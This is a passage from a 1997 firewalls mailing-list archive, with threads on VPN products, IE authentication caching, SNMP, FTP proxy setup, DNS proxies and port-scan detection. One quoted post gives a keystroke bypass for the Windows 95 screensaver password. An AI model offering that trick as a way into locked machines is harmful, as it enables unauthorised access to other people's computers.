there any good question a should ask the carrier company to know what they are up to ! Or should our thrust be given completely to the carrier company. thank's in advance Normand Bernier From firewalls-owner Wed Jan 15 23:29:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14424 for firewalls-outgoing; Wed, 15 Jan 1997 06:04:30 -0800 (PST) Received: from radmail.rad.co.il (radmail.rad.co.il [192.114.26.219]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA14349 for ; Wed, 15 Jan 1997 06:03:46 -0800 (PST) Received: from radguard.com ([192.114.26.210]) by radmail.rad.co.il (post.office MTA v1.9.3 ID# 0-12126) with SMTP id AAA11544; Wed, 15 Jan 1997 16:05:13 +0200 Received: by radguard.com (4.1/SMI-4.1) id AA29967; Wed, 15 Jan 97 16:03:48 IST Received: from elgamal.radguard.co.il(192.114.33.2) by gatekeeper.radguard.com via smap (V1.3) id sma029963; Wed Jan 15 16:03:45 1997 Received: by elgamal.radguard.com (4.1/SMI-4.1) id AA09232; Wed, 15 Jan 97 16:02:41 IST Date: Wed, 15 Jan 1997 16:02:41 +0200 (IST) From: Dan Frommer To: admin@unicc.org Cc: firewalls@greatcircle.com Subject: Re: Other VPN products In-Reply-To: <9701151034.AA13710@gh-old.unicc.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 15 Jan 1997 admin@unicc.org wrote: > I'm looking for more information on available VPN products. I implemented > AltaVista Tunnel and think it's a good product, but still would like to be > sure that I didn't miss any better offer. > > Did anybody try any other solutions? > > Thanks, Lilia > You might want to look at RADGUARD's CryptoWall (TM). The CryptoWall is a self-contained, "box" security gateway that offers VPN and access control functions. It provides sophisticated key management capabilities and uses hardware acceleration for encryption. CryptoWall devices are securely managed centrally, locally or regionally. Checkout www.radguard.com or info@radguard.com for more details. Dan Frommer From firewalls-owner Wed Jan 15 23:33:00 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14553 for firewalls-outgoing; Wed, 15 Jan 1997 06:06:00 -0800 (PST) Received: from inetsrv1.inetuk.wang.com (inetsrv1.inetuk.wang.com [193.115.8.97]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id GAA14495 for ; Wed, 15 Jan 1997 06:05:31 -0800 (PST) Received: from ccmailgw.inetuk.wang.com by inetsrv1.inetuk.wang.com with SMTP (1.38.193.4/16.2) id AA10784; Wed, 15 Jan 97 14:00:16 GMT Received: from cc:Mail by ccmailgw.biss.co.uk id AA853365838; Wed, 15 Jan 97 13:59:35 GMT Date: Wed, 15 Jan 97 13:59:35 GMT From: "Mike Hayden" Message-Id: <9700158533.AA853365838@ccmailgw.biss.co.uk> To: firewalls@GreatCircle.com Subject: Int.Exp.3.0/3.01 Cacheing problems Sender: firewalls-owner@GreatCircle.COM Precedence: bulk When doing an "NT Domain" authenticated http browse through an Eagle 3.06 NT firewall, I experienced "bad password", cacheing problems when using Internet Explorer 3.0/3.01 as the browser. Despite trying browser refreshes ,when deliberately entering a good NT username,but a bad NT password the "pop up" challenge continues to insist I am using a bad password, despite entering a good password on 2nd/3rd/4th retries ,etc. Then used Microsoft's SMS Network Monitor tool to capture http protocol traffic between the MAC address of my NT 4.0 Server hosted browser & MAC address of inside i/face of Eagle NT firewall. This revealed that the uuencoded password info was always the same,i.e the encoded bad password deliberately entered on first attempt. Has anyone else had the same probs. with IE 3.0/3.01? I did a test using Netscape Navigator 3.0 as the client browser, using NT Domain auth. method at the firewall and this worked a peach, so this seems to point the finger squarely at Microsoft.. Thanks in advance for your comments. Michael Hayden {Inet UK Ltd} mike_hayden@inetuk.wang.com From firewalls-owner Wed Jan 15 23:35:51 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA02973 for firewalls-outgoing; Wed, 15 Jan 1997 16:51:48 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01926 for ; Wed, 15 Jan 1997 16:49:11 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08503; Wed, 15 Jan 1997 14:05:43 -0800 Received: from gatekeeper.mcimail.com(192.147.45.5) by mycroft via smap (V1.3mjr) id sma008491; Wed Jan 15 14:04:53 1997 Received: from mailgate.mcimail.com (mailgate.mcimail.com [166.40.135.3]) by gatekeeper.mcimail.com (8.6.12/8.6.10) with SMTP id WAA17038; Wed, 15 Jan 1997 22:01:05 GMT Received: from mcimail.com by mailgate.mcimail.com id al02473; 15 Jan 97 22:05 WET Date: Wed, 15 Jan 97 17:04 EST From: Peter Ngo To: firewalls , Phil Cox Subject: Re: [INFO] Firewall monitoring tools != SNMP Message-Id: <94970115220449/0007044148PJ1EM@MCIMAIL.COM> X-MB-Info: Serial #: 191-30-2807 VERSION: 2.01H Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Phil, SNMP is a standardized remote monitoring and management mechanism for network devices such as hubs, routers, bridges and as well as workstations and servers. Therefore, any SNMP-capable management station could be able to monitor and control any SNMP-capable network device. The idea is that you do not want someone from the OUTSIDE to be able to manage our network via SNMP. Hence, you should not allow SNMP to cross our firewall. Peter ______________________________ Reply Separator _________________________________ Subject: [INFO] Firewall monitoring tools != SNMP Author: Phil Cox|INTERNET|pcc@stealth.ran.sandia.gov at MCIMAIL Date: 1/9/97 6:30 AM What tools (PD or Comercial) are availible for monitoring a firewall for performance/availiability from a remote station, while NOT using SNMP? -Phil * Philip C. Cox | Quote of the Day: * * pcox@sandia.gov | "Character : the decisions a person * * PAGER: (510) 355-5222 | makes when the choice is not * * VOICE: (510) 294-3149 | obvious." * From firewalls-owner Wed Jan 15 23:40:10 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17513 for firewalls-outgoing; Wed, 15 Jan 1997 07:13:56 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17477 for ; Wed, 15 Jan 1997 07:13:28 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id JAA04230; Wed, 15 Jan 1997 09:13:19 -0600 Date: Wed, 15 Jan 1997 09:05:20 -0600 (CST) From: Ron DuFresne To: Michael Cruz cc: palan@dataprep.com.my, Gunnar Ingvi Thorisson , firewalls@GreatCircle.COM, sneakers@CS.YALE.EDU Subject: Re: Re[2]: WIN'95 FLAW In-Reply-To: <2dbeae10@bracco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 14 Jan 1997, Michael Cruz wrote: > I thought this was the FIREWALL mailing list. > See what happens when you think without asking permission first! Later, Ron DuFresne > mike > > ______________________________ Reply Separator _________________________________ > Subject: Re: WIN'95 FLAW > Author: gunni@if.is (Gunnar Ingvi Thorisson) at *Internet* > Date: 1/14/97 8:14 AM > > > > I juz encountered a security (i would call it) flaw in M$ Windows'95 > > screensaver !! I don't know anyone of you encountered this or not but here > > it goes : > > > > If the Windows'95 Screen saver is active, you can break into without any > > password and all you have to do is : press the "windows" logo key (printed > > on the M$ keyboard) and there you are. > > > > If you don't have a M$ keyboard, press ALT+ESC keys to get access. I have > > tried this with my own PC and my friends. It works.....try on your own PC. > > This does not work for me, I've not tried to switch over to the English > keyboard yet (I'm using Icelandic). > > Gunni > gunni@if.is > gunni@coda.is > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Jan 15 23:47:01 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17252 for firewalls-outgoing; Wed, 15 Jan 1997 07:08:42 -0800 (PST) Received: from gatekeeper.paymentech.com (gatekeeper.paymentech.com [206.50.182.5]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17221 for ; Wed, 15 Jan 1997 07:08:11 -0800 (PST) Received: (from uucp@localhost) by gatekeeper.paymentech.com (8.7.4/8.6.12) id JAA02295; Wed, 15 Jan 1997 09:08:29 -0600 (CST) Message-Id: <199701151508.JAA02295@gatekeeper.paymentech.com> Received: from unknown(172.16.5.183) by gatekeeper.paymentech.com via smap (V1.3) id sma002287; Wed Jan 15 09:08:18 1997 From: "D. Todd Meckenstock" To: "Todd Graham Lewis" , "Pilar Lavin Mera" Cc: Subject: Re: TIS FWtk + netscape Date: Wed, 15 Jan 1997 09:06:37 -0600 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If your are using your web browser to do things like ftp://domain.com/pub, this is actually implemented over the http protocol as an anonymous login and does not use the ftp-proxy at all. If you need username/password sign-on to ftp sites, you have to implement the ftp proxy. The following are some suggestions: 1. Create a user on the firewall which will be given to all internal ftp proxies (their IP address is logged, so extra security on the inside is not really needed.) 2. Assign the ftp-gw proxy to run at a different port in /etc/services 3. Make sure the startup script in /usr/local/etc/mgmt/rc for the ftp-gw process uses this new port. 4. Identify users by approved IP address in the /usr/local/etc/netperm-table. This way even though firewall access on the client machines all use the same username to connect to the firewall, only machines with approved IP addresses can get through. 5. This is an "inside" to "outstide" strategy - meaning we do not allow people to connect from the Internet through our firewall to an ftp server. Hope this helps! -Todd ------------------------------------ D. Todd Meckenstock, Senior Director, New Technology First USA Paymentech, Inc. http://www.paymentech.com e:toddmeck@onramp.net v:214-849-4460 f:214-849-4774 ---------- > From: Todd Graham Lewis > To: Pilar Lavin Mera > Cc: firewalls@GreatCircle.COM > Subject: Re: TIS FWtk + netscape > Date: Tuesday, January 14, 1997 2:38 PM > > On Tue, 14 Jan 1997, Pilar Lavin Mera wrote: > > > My company has a network acceeding to internet through a SUN Sparc > > Station + Solaris 2.3 and we have installed the TIS FWtoolkit. Our > > problem is that we cannot configure netscape to pass through the > > ftp-proxy. Can anyone help us? > > I recommend using Squid for both anonymous ftp and web access. > > C.f.: http://www.nlanr.net/Squid > > __ > Todd Graham Lewis Linux! Core Engineering > Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804 > From firewalls-owner Thu Jan 16 00:26:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA02763 for firewalls-outgoing; Wed, 15 Jan 1997 16:51:15 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA01532 for ; Wed, 15 Jan 1997 16:48:09 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id OAA08962; Wed, 15 Jan 1997 14:58:52 -0800 Received: from danbury-usr3-2.nai.net(208.133.164.107) by mycroft via smap (V1.3mjr) id sma008953; Wed Jan 15 14:58:15 1997 Received: from boca.dsmith.nai.net (dsmith@localhost [127.0.0.1]) by boca.dsmith.nai.net (8.7.4/8.6.12) with ESMTP id RAA06484; Wed, 15 Jan 1997 17:57:21 -0500 (EST) Message-Id: <199701152257.RAA06484@boca.dsmith.nai.net> X-Mailer: exmh version 1.6.5 12/8/95 From: "David T. Smith" To: zwobada@apogee-com.fr cc: Firewalls@GreatCircle.COM Subject: Re: DNS Proxy and Internal Root Name Server In-reply-to: Your message of "Wed, 15 Jan 1997 21:07:57 +0100." <32DD391D.5A6A@apogee-com.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Jan 1997 17:57:17 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thanks for the tip -- I'll look at the #define to keep the cache clean and pointint to the right servers. DTS -- //==========================================================\\ ||David T. Smith | Specialists in || ||Tucker Network Technologies | Network Computing || ||50 Washington St., PO 429 | -------------------- || ||South Norwalk, CT 06856 | dsmith@tuckernet.com || \\=========================================================// In message <32DD391D.5A6A@apogee-com.fr>, Jean-Francois Zwobada writes: > >------------358E455512A711 >Content-Transfer-Encoding: 7bit >Content-Type: text/plain; charset=us-ascii > >David T. Smith wrote: >> >> We are looking at a solution similar to the one posted earlier >where the >> order of resolution is changed in the BIND code: instead of >resolution being >> performed in the order >> 1) authoritative, >> 2) forwarded and >> 3) cached, >> we believe that it may be useful to perform it in the order >> 1) authoritative, >> 2) cached, and >> 3) forwarded >> in the case of firewalled environments. >> >... D*mn, I missed your message till now... >Sorry to be respond so late. > >The problem with this is that the firewall will put additionnal records >in its >answer, thus telling you what are the Internet root servers. If you look >at the cache >before the forward option, you will ask them for information instead of >the >firewall DNS daemon... >Well, to be honest, I think I have seen a #define directive dealing with >the option >to disable the adjunction of additional infos, but I am not sure at >all.... :o) > >Regards > >JF >-- >_____ Jean-Francois Zwobada (mailto:zwobada@apogee-com.fr) _______ >Apogee Communications - Parc Club Orsay Universite > - 28, rue Jean Rostand 91893 ORSAY Cedex >Tel: +33 1 69.85.56.47 >Fax: +33 1 69.85.56.48 >___________ This guy is powered by a Z81 running CP/M ____________ > > -- //==========================================================\\ ||David T. Smith | Specialists in || ||Tucker Network Technologies | Network Computing || ||50 Washington St., PO 429 | -------------------- || ||South Norwalk, CT 06856 | dsmith@tuckernet.com || \\=========================================================// From firewalls-owner Thu Jan 16 00:40:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA05977 for firewalls-outgoing; Wed, 15 Jan 1997 17:07:21 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03635 for ; Wed, 15 Jan 1997 16:53:32 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id LAA06856; Wed, 15 Jan 1997 11:13:13 -0800 Received: from desvio.cnt.org.br(200.19.123.2) by mycroft via smap (V1.3mjr) id sma006844; Wed Jan 15 11:12:15 1997 Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA08946; Wed, 15 Jan 1997 16:07:02 -0300 From: ormonde@trem.cnt.org.br (Rodrigo Ormonde) Message-Id: <9701151907.AA08946@trem.cnt.org.br> Subject: Re: Unix or NT To: nvs2@cornell.edu Date: Wed, 15 Jan 1997 16:07:01 -0300 (GRNLNDST) Cc: firewalls@GreatCircle.COM In-Reply-To: from "nvs2@cornell.edu" at Jan 14, 97 01:52:04 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hi All, > I am a Master's student in Comp. Sc. and my master's project is the > design and implementation of a firewall. The basic question ahead of me > is whether to implement the firewall on NT or on Unix. > Now, I dont know the advantages / pitfalls of either approach and since > this is just a project my school doesnt care. > > But, all the discussions I hear on this mailing list are mainly about Unix > firewalls and all the books talk about Unix only.Does that mean that it > is tough to get any material to build Unix software.Also is it easier to > do it on Unix since everything is so easily avaliable. > > I would greatly appreciate any advice that people would have. > > Thanx > A very confused... > Nik. If you have the choice, implement it under Unix, or better, implement under a free unix, like FreeBSD or Linux. The great advantage is that you have all the sources of the kernel and of the utilities to learn and to use as a base to implement your own firewall. Other advantage is that under unix its easier to get good documentation of anything you need, including the kernel. And at last, what would you do if you have a technical question about your implementation ? If you were doing it under a freed unix it'd be easy to get the answer: just send a e-mail to one of the many lists that exists about them and quickly you'd get it. The same is not true for NT. Well, that's only my opition. Cheers, -- Rodrigo de La Rocque Ormonde e-mail: ormonde@cnt.org.br PGP Public key: finger ormonde@cnt.org.br From firewalls-owner Thu Jan 16 00:56:26 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA06041 for firewalls-outgoing; Wed, 15 Jan 1997 17:09:24 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03415 for ; Wed, 15 Jan 1997 16:52:54 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id MAA07608; Wed, 15 Jan 1997 12:11:28 -0800 Received: from firewall.apogee-com.fr(194.2.187.130) by mycroft via smap (V1.3mjr) id sma007605; Wed Jan 15 12:11:09 1997 Received: by dtcro002.apogee-com.fr; id VAA04637; Wed, 15 Jan 1997 21:13:00 +0100 (MET) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (3.2) id xma004635; Wed, 15 Jan 97 21:12:38 +0100 Received: from [10.132.24.6] by (4.1/SMI-4.1) id AA00690; Wed, 15 Jan 97 21:08:13 +0100 Message-Id: <32DD391D.5A6A@apogee-com.fr> Date: Wed, 15 Jan 1997 21:07:57 +0100 From: Jean-Francois Zwobada Reply-To: zwobada@apogee-com.fr Organization: APOGEE Communications X-Sender: Jean-Francois Zwobada X-Mailer: Mozilla 4.0b1 (Win95; I) Mime-Version: 1.0 To: "David T. Smith" Cc: Firewalls@GreatCircle.COM Subject: Re: DNS Proxy and Internal Root Name Server X-Priority: Normal References: <199701031425.JAA11930@boca.dsmith.nai.net> Content-Type: multipart/alternative; boundary="----------358E455512A711" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ------------358E455512A711 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii David T. Smith wrote: > > We are looking at a solution similar to the one posted earlier where the > order of resolution is changed in the BIND code: instead of resolution being > performed in the order > 1) authoritative, > 2) forwarded and > 3) cached, > we believe that it may be useful to perform it in the order > 1) authoritative, > 2) cached, and > 3) forwarded > in the case of firewalled environments. > ... D*mn, I missed your message till now... Sorry to be respond so late. The problem with this is that the firewall will put additionnal records in its answer, thus telling you what are the Internet root servers. If you look at the cache before the forward option, you will ask them for information instead of the firewall DNS daemon... Well, to be honest, I think I have seen a #define directive dealing with the option to disable the adjunction of additional infos, but I am not sure at all.... :o) Regards JF -- _____ Jean-Francois Zwobada (mailto:zwobada@apogee-com.fr) _______ Apogee Communications - Parc Club Orsay Universite - 28, rue Jean Rostand 91893 ORSAY Cedex Tel: +33 1 69.85.56.47 Fax: +33 1 69.85.56.48 ___________ This guy is powered by a Z81 running CP/M ____________ ------------358E455512A711 Content-Transfer-Encoding: 7bit Content-Type: text/html; charset=us-ascii
David T. Smith wrote:

>     We are looking at a solution similar to the one posted earlier where the
> order of resolution is changed in the BIND code:  instead of resolution being
> performed in the order
>    1) authoritative,
>    2) forwarded and
>    3) cached,
>  we believe that it may be useful to perform it in the order
>    1) authoritative,
>    2) cached, and
>    3) forwarded
> in the case of firewalled environments.

... D*mn, I missed your message till now...
Sorry to be respond so late.

The problem with this is that the firewall will put additionnal records in its
answer, thus telling you what are the Internet root servers. If you look at the cache
before the forward option, you will ask them for information instead of the
firewall DNS daemon...
Well, to be honest, I think I have seen a #define directive dealing with the option
to disable the adjunction of additional infos, but I am not sure at all.... :o)
 
Regards
 
JF
-- 
_____ Jean-Francois Zwobada (mailto:zwobada@apogee-com.fr) _______
Apogee Communications - Parc Club Orsay Universite
        - 28, rue Jean Rostand 91893 ORSAY Cedex
Tel: +33 1 69.85.56.47  
Fax: +33 1 69.85.56.48
___________ This guy is powered by a Z81 running CP/M ____________
 
------------358E455512A711-- From firewalls-owner Thu Jan 16 17:24:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA16394 for firewalls-outgoing; Wed, 15 Jan 1997 19:18:35 -0800 (PST) Received: from limbo.nwnet.net (limbo.nwnet.net [192.80.13.14]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA16378 for ; Wed, 15 Jan 1997 19:18:25 -0800 (PST) Received: from limbo.nwnet.net (localhost [127.0.0.1]) by limbo.nwnet.net (8.7.6/8.7.3) with SMTP id TAA00626 for ; Wed, 15 Jan 1997 19:16:22 -0800 Message-ID: <32DD9D86.7DCA3C6F@nwnet.net> Date: Wed, 15 Jan 1997 19:16:22 -0800 From: myles X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.27 i586) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: filtering w/ state & "smarts" Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi All, I'm tring to come up with a way to filter on things like this: If a remote host connects to more than X different ports on my machine in less than 1 minute, block connections from that host. So far the way's I've found or thought of to do this are 1) sf firewall on linux does this, but isn't commercially suported, and is pretty new. 2) Checkpoint FW-1's INSPECT language should be capable of doing this, but I can't find any way to set a variable for number of connections, or find the size of an array full of connections. 3) Clever use of syslog records. I like this idea, since it works on many different kinds of routers and firewalls. Given perl & time I could probably do this, but I'd be amazed if I wasn't re-inventing the wheel. It's also either hard or dangerous to have the syslog-parsing programs insert a new rule in the firewalling program. 4) filtering on some threshold number of connections should be possible. (but isn't on most products). This isn't a very good solution if it stops your mail traffic. can anybody add other ways of doing this filtering, &/or products I've missed? If anybody has a way of improving syslogging of attack signatures like this, I'd welcome that as well. thanks myles From firewalls-owner Thu Jan 16 17:49:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA15594 for firewalls-outgoing; Wed, 15 Jan 1997 19:03:38 -0800 (PST) Received: from halon.sybase.com (halon.sybase